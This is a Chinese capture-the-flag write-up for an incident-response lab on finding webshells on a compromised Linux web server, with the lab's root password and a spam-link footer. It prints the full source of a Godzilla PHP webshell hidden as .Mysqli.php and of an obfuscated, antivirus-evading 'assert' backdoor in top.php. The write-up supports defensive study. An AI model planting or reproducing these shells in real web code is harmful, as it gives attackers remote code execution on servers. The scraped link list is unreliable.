当前位置: 首页 > wzjs >正文

数码产品网站建设计划书美食网站素材

数码产品网站建设计划书,美食网站素材,分析网站建设的论文,泰安人才招聘信息网玄机——第一章 应急响应-webshell排查 目录 玄机——第一章 应急响应-webshell排查1、黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}2、黑客使用的什么工具的shell github地址的md5 flag{md5}3、黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx…

玄机——第一章 应急响应-webshell排查

目录

  • 玄机——第一章 应急响应-webshell排查
    • 1、黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
    • 2、黑客使用的什么工具的shell github地址的md5 flag{md5}
    • 3、黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
    • 4、黑客免杀马完整路径 md5 flag{md5}

简介:

靶机账号密码 root xjwebshell
1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
2.黑客使用的什么工具的shell github地址的md5 flag{md5}
3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
4.黑客免杀马完整路径 md5 flag{md5}

1、黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}

将/var/www/html整个打包下来: tar -czvf html.tar.gz ./

将打包的后的源码放入D盾扫描,得到4个可疑文件:

在这里插入图片描述

逐个分析,最终在gz.php中看到了一行注释:

在这里插入图片描述

因此,flag{027ccd04-5065-48b6-a32d-77c704a5e26d}

2、黑客使用的什么工具的shell github地址的md5 flag{md5}

$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){$data=encode($data,$key);if (isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);if (strpos($payload,"getBasicsInfo")===false){$payload=encode($payload,$key);}eval($payload);echo encode(@run($data),$key);}else{if (strpos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}

这是一段哥斯拉的webshell,它的项目地址是https://github.com/BeichenDream/Godzilla,转成md5即可:

在这里插入图片描述

因此,flag{39392de3218c333f794befef07ac9257}

3、黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx

让我们找出隐藏shell,我们可以在D盾的扫描结果中发现一个.Mysqli.php 的隐藏文件:

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){for($i=0;$i<strlen($D);$i++) {$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;
}
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){$data=encode($data,$key);if (isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);if (strpos($payload,"getBasicsInfo")===false){$payload=encode($payload,$key);}eval($payload);echo encode(@run($data),$key);}else{if (strpos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}
}

里面依旧是哥斯拉的webshell,从它的key值依旧为3c6e0b8a9c15224a也可以看出。

那么将转为md5即可,文件路径为:/var/www/html/include/Db/.Mysqli.php,转成md5:

在这里插入图片描述

因此,flag{aebac0e58cd6c5fad1695ee4d1ac1919}

4、黑客免杀马完整路径 md5 flag{md5}

让我们找出免杀马,将这几个文件丢入沙箱看看,发现只有top.php没有报毒:

在这里插入图片描述

于是看看top.php的代码逻辑:

<?php$key = "password";//ERsDHgEUC1hI
$fun = base64_decode($_GET['func']);
for($i=0;$i<strlen($fun);$i++){$fun[$i] = $fun[$i]^$key[$i+1&7];
}
$a = "a";
$s = "s";
$c=$a.$s.$_GET["func2"];
$c($fun);

这段代码用户通过URL传递两个参数func和func2。

func:经过Base64编码的字符串,解码后会被异或解密。func2:用于动态构造函数名。

通过这两个可控的参数,我们可以构造以下语句:

<?phperror_reporting(0);$key = "password";//ERsDHgEUC1hI
$fun = base64_decode('ERsDHgEUC1hI');
for($i=0;$i<strlen($fun);$i++){$fun[$i] = $fun[$i]^$key[$i+1&7];
}$a = "a";
$s = "s";
$c=$a.$s.'sert';
echo $c."(".$fun.")";

在这里插入图片描述

因此,flag就是把该文件路径转成md5值即可:flag{eeff2eabfd9b7a6d26fc1a53d3f7d1de}

在这里插入图片描述


文章转载自:

http://mnNN1nzI.ycwym.cn
http://GVgYWVvN.ycwym.cn
http://E1FZnMtR.ycwym.cn
http://neOTnXBz.ycwym.cn
http://41bxMeuN.ycwym.cn
http://O4dCG3yj.ycwym.cn
http://S2YxTgUe.ycwym.cn
http://GutZe0eR.ycwym.cn
http://4Nw0o7LW.ycwym.cn
http://hslNr8yQ.ycwym.cn
http://JsvAYc9F.ycwym.cn
http://IYdcnEq5.ycwym.cn
http://1fspVe8F.ycwym.cn
http://posp9oNF.ycwym.cn
http://omC7Opco.ycwym.cn
http://t88zml3M.ycwym.cn
http://3rG11zt9.ycwym.cn
http://XFIhWwdD.ycwym.cn
http://zUOjylo3.ycwym.cn
http://zfIx8CBH.ycwym.cn
http://UscoWZaT.ycwym.cn
http://bocCWaX7.ycwym.cn
http://Hybywooj.ycwym.cn
http://FLrIjDD9.ycwym.cn
http://5s53JB9l.ycwym.cn
http://Yg4CRLOI.ycwym.cn
http://6WS4YNRg.ycwym.cn
http://MWju3RyW.ycwym.cn
http://jF9ZquFB.ycwym.cn
http://QBQqGn2M.ycwym.cn
http://www.dtcms.com/wzjs/678247.html

相关文章:

  • php网站开发平台中山顺德网站建设
  • 大淘客构建自己的网站深圳ui设计师工资
  • 登陆注册是静态网站动画专业大学
  • 影视传媒网站源码网站开发需要看相关书籍
  • 网站管理助手ftp连接不上加盟网站建设
  • 企业网站建站系统哪个好用创建自己网站的步骤
  • 电商网站的内容设计网页设计软件免费下载
  • 韩国网站 后缀高水平的网站建设
  • 网站后台用什么语言网站云推广
  • html网站标签网站模板怎么做
  • 零基础学习做网站求职网站
  • 免费模板整站优化 快速排名
  • 企业网站seo 优帮云西部数码里面如何建设自己的网站
  • 免费做视频相册的网站网站设计公司飞沐
  • 东莞网站公司小说网站排名怎么做
  • 面对面视频 网站开发企业网站建设的实践意义
  • 扁平化的网站结构图营销型网站建设和规划
  • 软件公司网站源码seo公司赚钱吗
  • 国家企业官方网站查询系统如何进入一个网站开发人员工具
  • 郑州做个人网站的公司wordpress cue插件下载
  • 同个主体新增网站备案如何自学软件开发
  • 郫县网站建设上海网页设计师培训班
  • 深圳创建网站房地产行业网站开发
  • 北京市专业网站制作企业赣州是哪个省
  • 创建网站制作首页做网站推广运营前景
  • 网站列表页怎么做的条形码怎么做网页
  • discuz做网站如何做网站百科
  • 哪里有做网站公司的黄浦网站建设推广
  • 昆明 网站建设兼职湖南省建设厅政务中心网站
  • cms网站模板seo81